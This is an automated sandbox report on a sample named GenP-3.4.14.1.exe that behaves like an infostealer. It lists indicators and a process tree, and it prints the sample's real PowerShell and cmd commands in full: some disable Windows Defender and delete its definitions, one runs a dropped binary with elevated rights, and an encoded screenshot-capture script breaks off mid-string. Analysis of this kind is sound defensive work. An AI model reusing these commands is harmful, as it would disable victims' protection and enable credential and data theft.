Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 15:08
Behavioral task
behavioral1
Sample
GenP-3.4.14.1.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
GenP-3.4.14.1.exe
Resource
win10v2004-20241007-en
General
-
Target
GenP-3.4.14.1.exe
-
Size
8.1MB
-
MD5
18286deb642a79bd9af012a30dc872c7
-
SHA1
8cd8afa5d4da303d1b1be482dc077e0f9cbc7a45
-
SHA256
a5ce5fc1a69793f317e433cdc75ddc86ff19597e0355be3e82114fceabfec2e6
-
SHA512
4240a7bc05d96de14169808313b44a43b3965cf9a408d1c391a045f8537ecd0aeb1a56ccbd02799a31c52539f10e8414f0af3e69695e8d7913b3e3a378987d7e
-
SSDEEP
196608:BB0cD9a1Ljv+bhqNVoBKUh8mz4Iv9PQv1DVa:8i9CL+9qz8/b4Imv3a
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3020 powershell.exe 4072 powershell.exe 1692 powershell.exe 4972 powershell.exe 4956 powershell.exe 3428 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4460 cmd.exe 616 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3040 bound.exe 3184 rar.exe 224 NSudoLG.exe -
Loads dropped DLL 17 IoCs
pid Process 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe 4728 GenP-3.4.14.1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023c5a-87.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1504 tasklist.exe 4844 tasklist.exe 3672 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023c74-22.dat upx behavioral2/memory/4728-26-0x00007FFA81E20000-0x00007FFA82409000-memory.dmp upx behavioral2/files/0x0007000000023c66-28.dat upx behavioral2/files/0x0007000000023c72-30.dat upx behavioral2/memory/4728-31-0x00007FFA94F30000-0x00007FFA94F53000-memory.dmp upx behavioral2/memory/4728-50-0x00007FFA973B0000-0x00007FFA973BF000-memory.dmp upx behavioral2/files/0x0007000000023c6d-49.dat upx behavioral2/files/0x0007000000023c6c-48.dat upx behavioral2/files/0x0007000000023c6b-47.dat upx behavioral2/files/0x0007000000023c6a-46.dat upx behavioral2/files/0x0007000000023c69-45.dat upx behavioral2/files/0x0007000000023c68-44.dat upx behavioral2/files/0x0007000000023c67-43.dat upx behavioral2/files/0x0007000000023c65-42.dat upx behavioral2/files/0x0007000000023c79-41.dat upx behavioral2/files/0x0007000000023c78-40.dat upx behavioral2/files/0x0007000000023c77-39.dat upx behavioral2/files/0x0007000000023c73-36.dat upx behavioral2/files/0x0007000000023c71-35.dat upx behavioral2/memory/4728-56-0x00007FFA910D0000-0x00007FFA910FD000-memory.dmp upx behavioral2/memory/4728-58-0x00007FFA908E0000-0x00007FFA908F9000-memory.dmp upx behavioral2/memory/4728-60-0x00007FFA91430000-0x00007FFA91453000-memory.dmp upx behavioral2/memory/4728-62-0x00007FFA81CA0000-0x00007FFA81E17000-memory.dmp upx behavioral2/memory/4728-64-0x00007FFA97230000-0x00007FFA97249000-memory.dmp upx behavioral2/memory/4728-66-0x00007FFA91420000-0x00007FFA9142D000-memory.dmp upx behavioral2/memory/4728-68-0x00007FFA91180000-0x00007FFA911B3000-memory.dmp upx behavioral2/memory/4728-75-0x00007FFA81070000-0x00007FFA81592000-memory.dmp upx behavioral2/memory/4728-76-0x00007FFA94F30000-0x00007FFA94F53000-memory.dmp upx behavioral2/memory/4728-73-0x00007FFA815A0000-0x00007FFA8166D000-memory.dmp upx behavioral2/memory/4728-85-0x00007FFA80D90000-0x00007FFA80EAC000-memory.dmp upx behavioral2/memory/4728-84-0x00007FFA91410000-0x00007FFA9141D000-memory.dmp upx behavioral2/memory/4728-78-0x00007FFA91160000-0x00007FFA91174000-memory.dmp upx behavioral2/memory/4728-72-0x00007FFA81E20000-0x00007FFA82409000-memory.dmp upx behavioral2/memory/4728-135-0x00007FFA91430000-0x00007FFA91453000-memory.dmp upx behavioral2/memory/4728-199-0x00007FFA81CA0000-0x00007FFA81E17000-memory.dmp upx behavioral2/memory/4728-264-0x00007FFA97230000-0x00007FFA97249000-memory.dmp upx behavioral2/memory/4728-286-0x00007FFA91420000-0x00007FFA9142D000-memory.dmp upx behavioral2/memory/4728-289-0x00007FFA91180000-0x00007FFA911B3000-memory.dmp upx behavioral2/memory/4728-303-0x00007FFA815A0000-0x00007FFA8166D000-memory.dmp upx behavioral2/memory/4728-305-0x00007FFA81070000-0x00007FFA81592000-memory.dmp upx behavioral2/memory/4728-327-0x00007FFA94F30000-0x00007FFA94F53000-memory.dmp upx behavioral2/memory/4728-332-0x00007FFA81CA0000-0x00007FFA81E17000-memory.dmp upx behavioral2/memory/4728-326-0x00007FFA81E20000-0x00007FFA82409000-memory.dmp upx behavioral2/memory/4728-340-0x00007FFA80D90000-0x00007FFA80EAC000-memory.dmp upx behavioral2/memory/4728-341-0x00007FFA81E20000-0x00007FFA82409000-memory.dmp upx behavioral2/memory/4728-366-0x00007FFA815A0000-0x00007FFA8166D000-memory.dmp upx behavioral2/memory/4728-369-0x00007FFA81070000-0x00007FFA81592000-memory.dmp upx behavioral2/memory/4728-368-0x00007FFA91410000-0x00007FFA9141D000-memory.dmp upx behavioral2/memory/4728-367-0x00007FFA91160000-0x00007FFA91174000-memory.dmp upx behavioral2/memory/4728-365-0x00007FFA91180000-0x00007FFA911B3000-memory.dmp upx behavioral2/memory/4728-364-0x00007FFA91420000-0x00007FFA9142D000-memory.dmp upx behavioral2/memory/4728-363-0x00007FFA97230000-0x00007FFA97249000-memory.dmp upx behavioral2/memory/4728-362-0x00007FFA81CA0000-0x00007FFA81E17000-memory.dmp upx behavioral2/memory/4728-361-0x00007FFA91430000-0x00007FFA91453000-memory.dmp upx behavioral2/memory/4728-360-0x00007FFA908E0000-0x00007FFA908F9000-memory.dmp upx behavioral2/memory/4728-359-0x00007FFA910D0000-0x00007FFA910FD000-memory.dmp upx behavioral2/memory/4728-358-0x00007FFA973B0000-0x00007FFA973BF000-memory.dmp upx behavioral2/memory/4728-357-0x00007FFA94F30000-0x00007FFA94F53000-memory.dmp upx behavioral2/memory/4728-356-0x00007FFA80D90000-0x00007FFA80EAC000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3620 cmd.exe 1272 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1328 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 208 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 3020 powershell.exe 3020 powershell.exe 4072 powershell.exe 4972 powershell.exe 4072 powershell.exe 4972 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 2840 powershell.exe 2840 powershell.exe 616 powershell.exe 616 powershell.exe 4072 powershell.exe 4972 powershell.exe 2840 powershell.exe 616 powershell.exe 4956 powershell.exe 4956 powershell.exe 648 powershell.exe 648 powershell.exe 224 NSudoLG.exe 224 NSudoLG.exe 3428 powershell.exe 3428 powershell.exe 2396 powershell.exe 2396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 1504 tasklist.exe Token: SeDebugPrivilege 4844 tasklist.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeIncreaseQuotaPrivilege 3432 WMIC.exe Token: SeSecurityPrivilege 3432 WMIC.exe Token: SeTakeOwnershipPrivilege 3432 WMIC.exe Token: SeLoadDriverPrivilege 3432 WMIC.exe Token: SeSystemProfilePrivilege 3432 WMIC.exe Token: SeSystemtimePrivilege 3432 WMIC.exe Token: SeProfSingleProcessPrivilege 3432 WMIC.exe Token: SeIncBasePriorityPrivilege 3432 WMIC.exe Token: SeCreatePagefilePrivilege 3432 WMIC.exe Token: SeBackupPrivilege 3432 WMIC.exe Token: SeRestorePrivilege 3432 WMIC.exe Token: SeShutdownPrivilege 3432 WMIC.exe Token: SeDebugPrivilege 3432 WMIC.exe Token: SeSystemEnvironmentPrivilege 3432 WMIC.exe Token: SeRemoteShutdownPrivilege 3432 WMIC.exe Token: SeUndockPrivilege 3432 WMIC.exe Token: SeManageVolumePrivilege 3432 WMIC.exe Token: 33 3432 WMIC.exe Token: 34 3432 WMIC.exe Token: 35 3432 WMIC.exe Token: 36 3432 WMIC.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeIncreaseQuotaPrivilege 3432 WMIC.exe Token: SeSecurityPrivilege 3432 WMIC.exe Token: SeTakeOwnershipPrivilege 3432 WMIC.exe Token: SeLoadDriverPrivilege 3432 WMIC.exe Token: SeSystemProfilePrivilege 3432 WMIC.exe Token: SeSystemtimePrivilege 3432 WMIC.exe Token: SeProfSingleProcessPrivilege 3432 WMIC.exe Token: SeIncBasePriorityPrivilege 3432 WMIC.exe Token: SeCreatePagefilePrivilege 3432 WMIC.exe Token: SeBackupPrivilege 3432 WMIC.exe Token: SeRestorePrivilege 3432 WMIC.exe Token: SeShutdownPrivilege 3432 WMIC.exe Token: SeDebugPrivilege 3432 WMIC.exe Token: SeSystemEnvironmentPrivilege 3432 WMIC.exe Token: SeRemoteShutdownPrivilege 3432 WMIC.exe Token: SeUndockPrivilege 3432 WMIC.exe Token: SeManageVolumePrivilege 3432 WMIC.exe Token: 33 3432 WMIC.exe Token: 34 3432 WMIC.exe Token: 35 3432 WMIC.exe Token: 36 3432 WMIC.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 616 powershell.exe Token: SeDebugPrivilege 3672 tasklist.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 648 powershell.exe Token: SeDebugPrivilege 224 NSudoLG.exe Token: SeIncreaseQuotaPrivilege 2776 WMIC.exe Token: SeSecurityPrivilege 2776 WMIC.exe Token: SeTakeOwnershipPrivilege 2776 WMIC.exe Token: SeLoadDriverPrivilege 2776 WMIC.exe Token: SeSystemProfilePrivilege 2776 WMIC.exe Token: SeSystemtimePrivilege 2776 WMIC.exe Token: SeProfSingleProcessPrivilege 2776 WMIC.exe Token: SeIncBasePriorityPrivilege 2776 WMIC.exe Token: SeCreatePagefilePrivilege 2776 WMIC.exe Token: SeBackupPrivilege 2776 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 4728 2016 GenP-3.4.14.1.exe 83 PID 2016 wrote to memory of 4728 2016 GenP-3.4.14.1.exe 83 PID 4728 wrote to memory of 3964 4728 GenP-3.4.14.1.exe 84 PID 4728 wrote to memory of 3964 4728 GenP-3.4.14.1.exe 84 PID 4728 wrote to memory of 2596 4728 GenP-3.4.14.1.exe 85 PID 4728 wrote to memory of 2596 4728 GenP-3.4.14.1.exe 85 PID 4728 wrote to memory of 3148 4728 GenP-3.4.14.1.exe 86 PID 4728 wrote to memory of 3148 4728 GenP-3.4.14.1.exe 86 PID 4728 wrote to memory of 2600 4728 GenP-3.4.14.1.exe 87 PID 4728 wrote to memory of 2600 4728 GenP-3.4.14.1.exe 87 PID 4728 wrote to memory of 3244 4728 GenP-3.4.14.1.exe 92 PID 4728 wrote to memory of 3244 4728 GenP-3.4.14.1.exe 92 PID 4728 wrote to memory of 3588 4728 GenP-3.4.14.1.exe 94 PID 4728 wrote to memory of 3588 4728 GenP-3.4.14.1.exe 94 PID 4728 wrote to memory of 3376 4728 GenP-3.4.14.1.exe 95 PID 4728 wrote to memory of 3376 4728 GenP-3.4.14.1.exe 95 PID 3964 wrote to memory of 3020 3964 cmd.exe 98 PID 3964 wrote to memory of 3020 3964 cmd.exe 98 PID 2600 wrote to memory of 3040 2600 cmd.exe 99 PID 2600 wrote to memory of 3040 2600 cmd.exe 99 PID 3376 wrote to memory of 1504 3376 cmd.exe 100 PID 3376 wrote to memory of 1504 3376 cmd.exe 100 PID 4728 wrote to memory of 2108 4728 GenP-3.4.14.1.exe 101 PID 4728 wrote to memory of 2108 4728 GenP-3.4.14.1.exe 101 PID 3148 wrote to memory of 4072 3148 cmd.exe 106 PID 3148 wrote to memory of 4072 3148 cmd.exe 106 PID 2596 wrote to memory of 4972 2596 cmd.exe 109 PID 2596 wrote to memory of 4972 2596 cmd.exe 109 PID 4728 wrote to memory of 4552 4728 GenP-3.4.14.1.exe 110 PID 4728 wrote to memory of 4552 4728 GenP-3.4.14.1.exe 110 PID 3588 wrote to memory of 4844 3588 cmd.exe 103 PID 3588 wrote to memory of 4844 3588 cmd.exe 103 PID 4728 wrote to memory of 4460 4728 GenP-3.4.14.1.exe 104 PID 4728 wrote to memory of 4460 4728 GenP-3.4.14.1.exe 104 PID 4728 wrote to memory of 2520 4728 GenP-3.4.14.1.exe 105 PID 4728 wrote to memory of 2520 4728 GenP-3.4.14.1.exe 105 PID 4728 wrote to memory of 3852 4728 GenP-3.4.14.1.exe 107 PID 4728 wrote to memory of 3852 4728 GenP-3.4.14.1.exe 107 PID 4728 wrote to memory of 3620 4728 GenP-3.4.14.1.exe 108 PID 4728 wrote to memory of 3620 4728 GenP-3.4.14.1.exe 108 PID 4728 wrote to memory of 924 4728 GenP-3.4.14.1.exe 116 PID 4728 wrote to memory of 924 4728 GenP-3.4.14.1.exe 116 PID 3244 wrote to memory of 1692 3244 cmd.exe 118 PID 3244 wrote to memory of 1692 3244 cmd.exe 118 PID 2108 wrote to memory of 3432 2108 cmd.exe 120 PID 2108 wrote to memory of 3432 2108 cmd.exe 120 PID 924 wrote to memory of 2840 924 cmd.exe 123 PID 924 wrote to memory of 2840 924 cmd.exe 123 PID 3620 wrote to memory of 1272 3620 cmd.exe 121 PID 3620 wrote to memory of 1272 3620 cmd.exe 121 PID 3852 wrote to memory of 4292 3852 cmd.exe 124 PID 3852 wrote to memory of 4292 3852 cmd.exe 124 PID 4460 wrote to memory of 616 4460 cmd.exe 122 PID 4460 wrote to memory of 616 4460 cmd.exe 122 PID 2520 wrote to memory of 3672 2520 cmd.exe 126 PID 2520 wrote to memory of 3672 2520 cmd.exe 126 PID 4552 wrote to memory of 208 4552 cmd.exe 125 PID 4552 wrote to memory of 208 4552 cmd.exe 125 PID 4728 wrote to memory of 1492 4728 GenP-3.4.14.1.exe 127 PID 4728 wrote to memory of 1492 4728 GenP-3.4.14.1.exe 127 PID 1492 wrote to memory of 4432 1492 cmd.exe 129 PID 1492 wrote to memory of 4432 1492 cmd.exe 129 PID 4728 wrote to memory of 4840 4728 GenP-3.4.14.1.exe 130 PID 4728 wrote to memory of 4840 4728 GenP-3.4.14.1.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\NSudoLG.exeC:\Users\Admin\AppData\Local\Temp\NSudoLG.exe -U:T -P:E -M:S "C:\Users\Admin\AppData\Local\Temp\bound.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8A